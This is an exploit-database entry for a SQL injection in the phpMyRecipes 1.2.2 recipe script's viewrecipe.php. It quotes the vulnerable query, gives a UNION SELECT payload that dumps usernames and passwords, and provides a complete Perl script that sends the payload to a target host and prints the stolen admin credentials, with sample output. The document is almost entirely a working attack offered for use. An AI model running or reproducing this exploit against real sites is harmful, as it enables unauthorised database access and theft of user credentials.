PHPMyRecipes 1.2.2 – ‘viewrecipe.php?r_id’ SQL Injection

• Exploit Database
• 13 阅读

• 作者： cr4wl3r
  日期： 2013-02-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24537/

• #phpMyRecipes 1.2.2 SQL Injection Exploit
  #By cr4wl3r http://bastardlabs.info
  #Script: http://sourceforge.net/projects/php-myrecipes/files/
  #Demo: http://bastardlabs.info/demo/phpMyRecipes.png
  #Tested: Ubuntu Linux
  #
  # Bugs found in viewrecipe.php
  #
  #$r_id = $_GET['r_id'];
  #
  #if (! ($result = mysql_query("SELECT
  # name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) {
  #dberror("viewrecipe.php", "Cannot select recipe");
  #}
  #
  # http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=[SQLi]
  # Example: http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users
  #
  #
  # $ perl recipes.pl localhost /demo/
  # [+] Please Wait ...
  #
  # [+] Getting Username and Password[ ok ]
  # [+] w00tw00t
  # [+] Username | Password --> admin:mps4BNRRjh3po
  
  #!/usr/bin/perl
  
  use IO::Socket;
  
  $host = $ARGV[0];
  $path = $ARGV[1];
  
  if (@ARGV < 2) { 
  
  print qq(
  +---------------------------------------------+
  | phpMyRecipes 1.2.2 SQL Injection Exploit|
  | |
  |coded & exploited by cr4wl3r |
  | http://bastardlabs.info/|
  +---------------------------------------------+
  -=[X]=-
   +---------------------------------------
  Usage :
   
  perl $0 <host> <path>
  ex : perl $0 127.0.0.1 /phpMyRecipes/
   
   +---------------------------------------
  );
  }
  
  $target = "http://".$host.$path."/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users";
  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", 
  PeerPort=>"80") || die "[-] Can't connect to Server [ failed ]\n";
  print "[+] Please Wait ...\n";
  print $sock "GET $target HTTP/1.1\n";
  print $sock "Accept: */*\n";
  print $sock "User-Agent: BastardLabs\n";
  print $sock "Host: $host\n";
  print $sock "Connection: close\n\n";
  sleep 2;
  while ($answer = <$sock>) {
  if ($answer =~ /<B>(.*?)<\/B>/) {
  print "\n[+] Getting Username and Password[ ok ]\n";
  sleep 1;
  print "[+] w00tw00t\n";
  print "[+] Username | Password --> $1\n";
  exit();
  }
  }
  print "[-] Exploit Failed !\n";